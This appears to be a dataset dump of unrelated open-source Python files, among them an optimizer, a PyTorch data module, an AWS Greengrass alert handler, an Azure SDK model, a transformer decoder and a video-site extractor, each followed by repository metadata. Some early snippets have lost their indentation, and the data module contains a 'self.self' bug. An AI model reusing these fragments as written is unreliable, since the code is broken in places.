def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def _backup_and_load_cache(self):
"""Useful for performing evaluation on the slow weights (which typically generalize better)
"""
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
param_state['backup_params'] = torch.zeros_like(p.data)
param_state['backup_params'].copy_(p.data)
p.data.copy_(param_state['cached_params'])
def _clear_and_load_backup(self):
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
p.data.copy_(param_state['backup_params'])
del param_state['backup_params']
@property
def param_groups(self):
return self.optimizer.param_groups
def step(self, closure=None):
"""Performs a single Lookahead optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = self.optimizer.step(closure)
self._la_step += 1
if self._la_step >= self._total_la_steps:
self._la_step = 0
# Lookahead and cache the current optimizer parameters
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
p.data.mul_(self.la_alpha).add_(param_state['cached_params'], alpha=1.0 - self.la_alpha) # crucial line
param_state['cached_params'].copy_(p.data)
if self.pullback_momentum == "pullback":
internal_momentum = self.optimizer.state[p]["momentum_buffer"]
self.optimizer.state[p]["momentum_buffer"] = internal_momentum.mul_(self.la_alpha).add_(
1.0 - self.la_alpha, param_state["cached_mom"])
param_state["cached_mom"] = self.optimizer.state[p]["momentum_buffer"]
elif self.pullback_momentum == "reset":
self.optimizer.state[p]["momentum_buffer"] = torch.zeros_like(p.data)
return loss
| [
"noreply@github.com"
] | noreply@github.com |
b116ab0d106d450a2588ca813cf8f785bac5d357 | de088c95a043757049dee381ee9a63da9a7c0a61 | /bits/NumberOfOneBits/solution.py | 8ca6fefb0c196ed269807ebd2b8959c28edda77f | [] | no_license | tstl87/PythonInterviewQuestions | 74f8cbf198c5dcc793abe195e1e19fa4fd77c947 | 35758f897c0e4eb2653617b29cbe23c28447f05f | refs/heads/master | 2023-04-04T15:01:35.650611 | 2021-03-31T16:54:46 | 2021-03-31T16:54:46 | 255,759,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | def one_bits(n):
count = 0
while n > 0:
if n & 1:
count += 1
n = n >> 1
return count
print(one_bits(23))
# 0b10111 | [
"Skylar.Trigueiro@gmail.com"
] | Skylar.Trigueiro@gmail.com |
d29e69deb81568751f654286b92db80ff300ebf9 | 49bc52bb78181adad44f2ca4723bf102547cfd0b | /tests/unit/test_routes.py | a4b793b548d7f33f8690170ae88c95c135dd1c60 | [
"MIT"
] | permissive | CryptoJones/resources_api | d65ea31f468f9ebfcdd36500db0185e9d6353cf1 | f290b165415c08f1fb90ace36cad222549dbe7d5 | refs/heads/master | 2020-04-09T20:44:07.105219 | 2018-12-07T02:26:51 | 2018-12-07T02:26:51 | 160,582,699 | 0 | 0 | MIT | 2018-12-05T21:45:57 | 2018-12-05T21:45:56 | null | UTF-8 | Python | false | false | 278 | py | import pytest
from app.models import Resource, Language, Category
def test_does_nothing():
"""
GIVEN a User model
WHEN a new User is created
THEN check the email, hashed_password, authenticated, and role fields are defined correctly
"""
assert(1 == 1)
| [
"wimo7083@colorado.edu"
] | wimo7083@colorado.edu |
75f699fc7133cc78df3b45856ce7c1263bde245b | 83133aa5638bd29730d10e9d4d1fbdf97f0844b8 | /stl_text/datamodule/contrastive_pretraining.py | 015b19ccabbbf90ad5e0087278c17f3ffe1c90cc | [] | no_license | hudeven/text | 1f38fa81205f727011fe8dd29023acf653773083 | 9fc5b4962282d7e1dc8d5fa5eb3258f253981060 | refs/heads/master | 2023-02-27T03:26:46.424043 | 2021-01-05T22:37:57 | 2021-01-05T22:37:57 | 318,316,656 | 0 | 4 | null | 2021-02-23T01:05:18 | 2020-12-03T20:52:10 | Python | UTF-8 | Python | false | false | 4,619 | py | import os
import random
from collections import defaultdict
from typing import Optional
import torch
import datasets as ds
from pytorch_lightning import LightningDataModule
from stl_text.ops.tokenizers import WhitespaceTokenizer
from stl_text.ops.transforms import LabelTransform
from torch.nn.utils.rnn import pad_sequence
from stl_text.ops.samplers import PoolBatchSampler
from .doc_classification import DocClassificationDataModule
class ContrastivePretrainingDataModule(LightningDataModule):
def __init__(self, data_path: str = 'paraphrases', vocab_path: Optional[str] = None, batch_size: int = 32,
drop_last: bool = False,
num_proc_in_map: int = 1, distributed: bool = False, load_from_cache_file: bool = True):
super().__init__()
self.data_path = data_path
self.vocab_path = vocab_path
self.batch_size = batch_size
self.drop_last = drop_last
self.num_proc_in_map = num_proc_in_map
self.distributed = distributed
self.load_from_cache_file = load_from_cache_file
self.text_transform = None
self.datasets = {}
def setup(self, stage):
self.text_transform = WhitespaceTokenizer(vocab_path=self.vocab_path)
for split in ("train", "valid", "test"):
self.datasets[split] = ds.Dataset.load_from_disk(os.path.join(self.data_path, split)) # raw dataset
self.datasets[split] = self.datasets[split].map(function=lambda x: {'anchor_ids': self.text_transform(x)},
input_columns='anchor', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split] = self.datasets[split].map(function=lambda xs: {'all_positive_ids': [self.text_transform(x) for x in xs]},
input_columns='positives', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split] = self.datasets[split].map(function=lambda x: {'seq_len': len(x)},
input_columns='anchor_ids', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split].set_format(type='torch', columns=['anchor_ids', 'all_positive_ids', 'seq_len'])
def forward(self, text):
return self.text_transform(text)
def train_dataloader(self):
# sample data into `num_batches_in_page` sized pool. In each pool, sort examples by sequence length, batch them
# with `batch_size` and shuffle batches
batch_sampler = PoolBatchSampler(self.datasets["train"], batch_size=self.batch_size,
drop_last=self.drop_last, key=lambda row: row["seq_len"])
return torch.utils.data.DataLoader(self.datasets["train"], batch_sampler=batch_sampler,
num_workers=1,
collate_fn=self.collate)
def valid_dataloader(self):
return torch.utils.data.DataLoader(self.self.datasets["valid"], shuffle=True, batch_size=self.batch_size,
num_workers=1,
collate_fn=self.collate)
def test_dataloader(self):
return torch.utils.data.DataLoader(self.datasets["test"], shuffle=False, batch_size=self.batch_size,
num_workers=1,
collate_fn=self.collate)
def collate(self, batch):
for row in batch:
row["positive_ids"] = random.sample(row["all_positive_ids"], 1)[0]
row.pop("all_positive_ids")
return self._collate(batch, pad_columns=("anchor_ids", "positive_ids"))
# generic collate(), same as DocClassificationDataModule
def _collate(self, batch, pad_columns=("token_ids",)):
columnar_data = defaultdict(list)
for row in batch:
for column, value in row.items():
columnar_data[column].append(value)
padded = {}
for column, v in columnar_data.items():
if pad_columns and column in pad_columns:
padded[column] = pad_sequence(v, batch_first=True)
else:
padded[column] = torch.tensor(v, dtype=torch.long)
return padded
| [
"jeanm@fb.com"
] | jeanm@fb.com |
ac29b396e23dbd83410cb6934bf7dbe55c6370d4 | 09b7d73751a87a48e1a624e076465b343a36a137 | /python-tutorial/basics/types.py | 8cdee3b8b8e16f9cae863c7a124127247b178f78 | [] | no_license | sauravpd/python-tutorial | 8fa11efce996d05d00ebd4bd77409b9a214224ae | 5455bff62ea543ed47b9f8cb9fea67a7b48f8cd2 | refs/heads/master | 2020-04-09T09:43:21.028083 | 2020-01-17T05:58:43 | 2020-01-17T05:58:43 | 160,244,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | x = '48'
y = int(x)
print(f'x is {type(x)}')
print(f'x is {x}')
print(f'y is {type(y)}')
print(f'y is {y}')
# output
#x is <class 'str'>
#x is 48
#y is <class 'int'>
#y is 48 | [
"sauravpd58@gmail.com"
] | sauravpd58@gmail.com |
d3920d74c46452fd447b57f7c829897273f96be7 | 5fc25caef429a2a417a2bdcbeb4b5836c888039f | /ch1/chatting/forms/__init__.py | 5ef72d0039cd87c5d18cc24b2d066be36d45c77a | [] | no_license | dudrnxps/SLANG | f02329e5961c532ae23a3777a116dc1929ee296b | 97d3db6764e80272d9c03b38ff45c5ec55398e9a | refs/heads/master | 2021-01-15T15:31:12.747511 | 2016-06-27T15:48:30 | 2016-06-27T15:48:30 | 50,901,344 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | from chatting.forms.register import RegistrationForm
from chatting.forms.authentication import AuthenticationForm | [
"mkh9209@naver.com"
] | mkh9209@naver.com |
a25e9e320b9dd225167269a092870511465d8631 | 2099fcc36b619db1ff333042f5ab3bd044c7c542 | /client.py | 6c4e363752ca011f64bd68b047123f7f6c7687b6 | [] | no_license | AlekefromKz/Python-Game-TruthOrFalse | 2b27315a5e1b8cf2e261e617d3a5bda50ba87287 | 203a7800b801a04801b83b15962c879e75cf75aa | refs/heads/master | 2023-02-02T19:18:04.556175 | 2020-12-18T17:37:27 | 2020-12-18T17:37:27 | 322,663,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from truth_or_false.game import Game
from truth_or_false.game_status import GameStatus
print('Welcome to my gameY you will be asking questions one by one. In case you will not make more mistakes than you '
'allowed to make, you will win. Otherwise you will loose!\n\n')
game = Game()
game.get_data()
while game.status == GameStatus.STARTED:
print('The question is:')
print(game.ask_question())
if game.answer_question(input('\nEnter your answer "y"/"n": ')):
print('Right answer!', game.correct_answer())
else:
print('Yow were close!', game.correct_answer())
print('\n')
if game.won:
print('Congratulations!')
else:
print('You lost!') | [
"kydyrmin.almaz@gmail.com"
] | kydyrmin.almaz@gmail.com |
56baa2cdea930d040883beca412dc675f051ecbf | cf4a525ed3f78e50b830fe23642d0127c3e05531 | /bucket list/bl-tail.py | d9e9a26151fc448d47827852a6c77e326a341214 | [] | no_license | pomann/programming_1_ca116 | a41514a72dc35e6011852b94e5454c91048f3252 | 8a78a5b5d292003272aec004cab1ebe8b012e54c | refs/heads/master | 2021-05-04T00:45:51.189173 | 2018-02-05T19:39:09 | 2018-02-05T19:39:09 | 120,350,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import sys
n = int(sys.argv[1])
f = raw_input()
m = []
i = 0
while f != "end":
m.append(f)
i += 1
f = raw_input()
if n > i:
o = 0
else:
o = i - n
while o < i:
print m[o]
o += 1
| [
"noreply@github.com"
] | noreply@github.com |
4501b4fd57612ad8cd33bb4bb8c8a53dd3e26d8b | 97b0ddc00ccb6ba1bdf75a683e9abf64659e7229 | /src/greengrass/lambda/alert/greengrass_alert.py | 423a5acf36c8674cdf73603278a3ffb0feeb30ac | [] | no_license | brenogibson/octank-monitoring-kiosk | 75cd9a2d6535ae58e5afbb546be9c5b9bf37d702 | 54cc06f3da436ff3d05953ab6e0fd81ac9efef8b | refs/heads/master | 2022-11-17T13:08:46.256198 | 2020-07-15T18:42:02 | 2020-07-15T18:42:02 | 278,373,741 | 0 | 0 | null | 2020-07-09T14:08:28 | 2020-07-09T13:34:07 | null | UTF-8 | Python | false | false | 1,385 | py | #
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# greengrassHelloWorldCounter.py
# Demonstrates a simple publish to a topic using Greengrass core sdk
# This lambda function will retrieve underlying platform information and send a hello world message along with the
# platform information to the topic 'hello/world/counter' along with a counter to keep track of invocations.
#
# This Lambda function requires the AWS Greengrass SDK to run on Greengrass devices.
# This can be found on the AWS IoT Console.
import json
import logging
import platform
import sys
import time
import greengrasssdk
# Setup logging to stdout
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# Creating a greengrass core sdk client
client = greengrasssdk.client("iot-data")
# Retrieving platform information to send from Greengrass Core
my_platform = platform.platform()
def function_handler(event, context):
if event['temperature'] > 37 :
try:
client.publish(
topic="kiosk/alert",
queueFullPolicy="AllOrException",
payload=json.dumps(
{"alert": {"temperature" : event['temperature']}}
),
)
except Exception as e:
logger.error("Failed to publish message: " + repr(e))
return
| [
"brenogibson94@gmail.com"
] | brenogibson94@gmail.com |
660782ca798d9ea8a567e5e704ec1f94490e19fd | 92636e4af15b08dcf1e64d31678cdefe125a99b9 | /setup.py | 35b73df5e4597e7108ee50a4e77e036eefe56f70 | [] | no_license | karpov-sv/fram | 7e09a89cbc0c6ac428d1c522e20b22932a71ad66 | f4d2ced8194905030d779c11c5f8b411dd2a9966 | refs/heads/master | 2023-06-22T14:13:45.627062 | 2023-06-15T12:15:13 | 2023-06-15T12:15:13 | 142,578,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from setuptools import setup, find_packages
requirements = [
'numpy',
'scipy',
'astropy',
'matplotlib',
'sep',
'statsmodels',
'esutil',
'psycopg2-binary',
'ephem',
'supersmoother',
# For web interface
'scikit-build', # needed for line-profiler below?..
'django',
# 'django-debug-toolbar',
# 'django-debug-toolbar-line-profiler',
'django-el-pagination',
'markdown',
]
setup(
name='fram',
version='0.1',
description='FRAM telescope related codes',
author='Sergey Karpov',
author_email='karpov.sv@gmail.com',
url='',
install_requires=requirements,
packages=['fram'],
package_dir={'':'src'}, # src/fram, symlink to fram, to behave nicely with development install
)
| [
"karpov.sv@gmail.com"
] | karpov.sv@gmail.com |
08541c40fee9474b87a66113054f486ea71f0e98 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-network/azure/mgmt/network/models/network_interface.py | fa19b8e2ad03dfa74bef269fdcb7d724b08d0661 | [
"MIT"
] | permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 4,531 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkInterface(Resource):
"""A NetworkInterface in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource Id
:type id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param virtual_machine: Gets or sets the reference of a VirtualMachine
:type virtual_machine: :class:`SubResource
<azure.mgmt.network.models.SubResource>`
:param network_security_group: Gets or sets the reference of the
NetworkSecurityGroup resource
:type network_security_group: :class:`NetworkSecurityGroup
<azure.mgmt.network.models.NetworkSecurityGroup>`
:param ip_configurations: Gets or sets list of IPConfigurations of the
network interface
:type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
<azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
:param dns_settings: Gets or sets DNS settings in network interface
:type dns_settings: :class:`NetworkInterfaceDnsSettings
<azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
:param mac_address: Gets the MAC address of the network interface
:type mac_address: str
:param primary: Gets whether this is a primary NIC on a virtual machine
:type primary: bool
:param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
on the NIC
:type enable_ip_forwarding: bool
:param resource_guid: Gets or sets resource guid property of the network
interface resource
:type resource_guid: str
:param provisioning_state: Gets provisioning state of the PublicIP
resource Updating/Deleting/Failed
:type provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
'primary': {'key': 'properties.primary', 'type': 'bool'},
'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
self.virtual_machine = virtual_machine
self.network_security_group = network_security_group
self.ip_configurations = ip_configurations
self.dns_settings = dns_settings
self.mac_address = mac_address
self.primary = primary
self.enable_ip_forwarding = enable_ip_forwarding
self.resource_guid = resource_guid
self.provisioning_state = provisioning_state
self.etag = etag
| [
"lmazuel@microsoft.com"
] | lmazuel@microsoft.com |
cbc244e711bf6a4c305a2d03973ffb5ac09658b0 | 85a6fcace7eaff15242595bdf9b9e8f41116dc7f | /Round A/workout.py | 7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1 | [
"MIT"
] | permissive | Meenadshi/GoogleKickStart-2020 | e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b | 7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df | refs/heads/main | 2023-08-15T23:41:31.484139 | 2021-10-17T00:34:58 | 2021-10-17T00:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
count = 0
for i in xrange(1, len(M)):
count += ((M[i]-M[i-1])-1)//target # ceiling(diff/target)-1
if count > K:
return False
return True
def workout():
N, K = map(int, raw_input().strip().split())
M = map(int, raw_input().strip().split())
left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
while left <= right:
mid = left + (right-left)//2
if check(M, K, mid):
right = mid-1
else:
left = mid+1
return left
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, workout())
| [
"kamyu104@gmail.com"
] | kamyu104@gmail.com |
a9194341e115335348649466389655b10bc7ccd4 | caa05194b8f11f29a19767c94fdc93628be694d5 | /nemo/collections/nlp/modules/common/transformer/transformer_decoders.py | 910a7104ea24d2870a596d91e46359933d887e99 | [
"Apache-2.0"
] | permissive | Jimmy-INL/NeMo | a589ab0ab97b9ccb8921579670e80c470ce7077b | 6a3753b3013dc92a3587853d60c5086e2e64d98f | refs/heads/main | 2023-04-02T22:28:29.891050 | 2021-04-13T18:22:24 | 2021-04-13T18:22:24 | 357,681,603 | 1 | 0 | Apache-2.0 | 2021-04-13T20:34:12 | 2021-04-13T20:34:12 | null | UTF-8 | Python | false | false | 8,169 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
"""
Building block of Transformer decoder.
Args:
hidden_size: size of the embeddings in the model, also known as d_model
inner_size: number of neurons in the intermediate part of feed-forward
net, usually is (4-8 x hidden_size) in the papers
num_attention_heads: number of heads in multi-head attention
attn_score_dropout: probability of dropout applied to attention scores
attn_layer_dropout: probability of dropout applied to the output of the
attention layers, but before layer normalization
ffn_dropout: probability of dropout applied to FFN output
hidden_act: activation function used between two linear layers in FFN
"""
def __init__(
self,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
self.pre_ln = pre_ln
self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
self.first_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
self.second_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)
def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Pre-LayerNorm block
Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
"""
residual = decoder_query
decoder_query = self.layer_norm_1(decoder_query)
decoder_keys = self.layer_norm_1(decoder_keys)
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += residual
residual = self_attn_output
self_attn_output = self.layer_norm_2(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += residual
residual = enc_dec_attn_output
enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += residual
return output_states
def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
    """
    Post-LayerNorm block.

    Order of operations:
    Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
    """
    # Self-attention with a residual from the raw query, normalized after.
    x = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask) + decoder_query
    x = self.layer_norm_1(x)

    # Cross-attention over the encoder states, residual, then normalize.
    y = self.second_sub_layer(x, encoder_states, encoder_states, encoder_mask) + x
    y = self.layer_norm_2(y)

    # Feed-forward, residual, and a final normalization on the way out.
    z = self.third_sub_layer(y) + y
    return self.layer_norm_3(z)
def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
    """Dispatch to the pre-LN or post-LN variant chosen at construction time."""
    impl = self.forward_preln if self.pre_ln else self.forward_postln
    return impl(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
    """Stack of TransformerDecoderBlock layers with optional caching of
    per-layer hidden states for fast autoregressive generation.

    Fix over the previous revision: the ``train()``/``eval()`` overrides now
    return ``self``, restoring nn.Module's fluent contract (they previously
    returned ``None``, breaking ``model = Model(...).eval()`` chains).
    """

    def __init__(
        self,
        num_layers: int,
        hidden_size: int,
        inner_size: int,
        num_attention_heads: int = 1,
        attn_score_dropout: float = 0.0,
        attn_layer_dropout: float = 0.0,
        ffn_dropout: float = 0.0,
        hidden_act: str = "relu",
        pre_ln: bool = False,
    ):
        super().__init__()
        # Build one prototype block and deep-copy it per layer: each layer
        # owns separate parameter tensors (initial values are identical).
        layer = TransformerDecoderBlock(
            hidden_size,
            inner_size,
            num_attention_heads,
            attn_score_dropout,
            attn_layer_dropout,
            ffn_dropout,
            hidden_act,
            pre_ln,
        )
        self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
        # Diagonal offset for the causal attention mask: 0 while training
        # (causal masking on), None in eval mode (no masking, used with
        # cached incremental decoding).  Toggled by train()/eval() below.
        self.diagonal = 0

    def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
        """Prepend the cached states for layer ``i`` (if any) so attention
        keys/values cover the whole decoded prefix."""
        if decoder_mems_list is not None:
            memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
        else:
            memory_states = decoder_states
        return memory_states

    def forward(
        self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
    ):
        """
        Args:
            decoder_states: output of the embedding layer (B x L_dec x H)
            decoder_mask: decoder inputs mask (B x L_dec)
            encoder_states: output of the encoder (B x L_enc x H)
            encoder_mask: encoder inputs mask (B x L_enc)
            decoder_mems_list: list of the cached decoder hidden states
                for fast autoregressive generation which will be used instead
                of decoder_states as keys and values if not None
            return_mems: bool, whether to return outputs of all decoder layers
                or the last layer only
        """
        decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
        encoder_attn_mask = form_attention_mask(encoder_mask)
        memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
        cached_mems_list = [memory_states]
        for i, layer in enumerate(self.layers):
            # memory_states serves as the self-attention keys/values so the
            # block can attend over the full cached prefix.
            decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
            memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
            cached_mems_list.append(memory_states)
        if return_mems:
            return cached_mems_list
        else:
            return cached_mems_list[-1]

    def eval(self):
        # Disable the causal diagonal for cached autoregressive inference.
        self.diagonal = None
        return super().eval()  # fix: propagate nn.Module's `return self`

    def train(self, mode=True):
        if mode is True:
            self.diagonal = 0
        else:
            self.diagonal = None
        return super().train(mode)  # fix: propagate nn.Module's `return self`

    def input_example(self):
        """
        Generates input examples for tracing etc.

        Returns:
            A tuple of input examples.
        """
        sample = next(self.parameters())
        input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
        # NOTE(review): high=1 makes this mask all zeros -- confirm intended.
        encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
        return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
| [
"noreply@github.com"
] | noreply@github.com |
ab81b868a0040eb8cd4674fd20d3f934f5141499 | 981ecc9cf59dd6f839c3e40d26601efb1d073558 | /src/face_recognition/youtube_dl/extractor/tf1.py | e595c4a69b3f03361abc05f6bca61adecb61cf36 | [
"MIT"
] | permissive | lodemo/CATANA | 469e0684b816f09ac74f186552b463cc77db369e | a349f460772511ccbb16429b40bfb50f774d45d4 | refs/heads/master | 2023-03-30T04:07:12.070332 | 2021-02-03T21:47:32 | 2021-02-03T21:47:32 | 102,767,095 | 12 | 6 | MIT | 2023-03-24T21:55:24 | 2017-09-07T17:36:45 | Jupyter Notebook | UTF-8 | Python | false | false | 2,239 | py | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
    """TF1 uses the wat.tv player.

    All TF1-group sites matched below embed a wat.tv player, so extraction
    only needs to locate the embedded wat video id and delegate to the Wat
    extractor.
    """
    _VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
    # Test fixtures used by youtube-dl's extractor test harness.
    _TESTS = [{
        'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
        'info_dict': {
            'id': '10635995',
            'ext': 'mp4',
            'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
            'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
        },
        'params': {
            # Sometimes wat serves the whole file with the --test option
            'skip_download': True,
        },
    }, {
        'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
        'info_dict': {
            'id': 'le-grand-mysterioso-chuggington-7085291-739',
            'ext': 'mp4',
            'title': 'Le grand Mystérioso - Chuggington',
            'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
            'upload_date': '20150103',
        },
        'params': {
            # Sometimes wat serves the whole file with the --test option
            'skip_download': True,
        },
        'skip': 'HTTP Error 410: Gone',
    }, {
        'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
        'only_matching': True,
    }, {
        'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
        'only_matching': True,
    }, {
        'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)
        # The wat.tv player is embedded via an iframe whose URL carries an
        # 8-digit video id; capture that id from the page markup.
        wat_id = self._html_search_regex(
            r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
            webpage, 'wat id', group='id')
        # Delegate format resolution to the Wat extractor.
        return self.url_result('wat:%s' % wat_id, 'Wat')
| [
"moritzlode@gmail.com"
] | moritzlode@gmail.com |
90652981b11712f044ed74cc7b84d1c10dba3246 | 57000e1000311e6428a2eb45732baf265a7d9eb7 | /helpers.py | a4b347fe740919052cb0ad10e0e8cb2a5fee69b5 | [
"WTFPL"
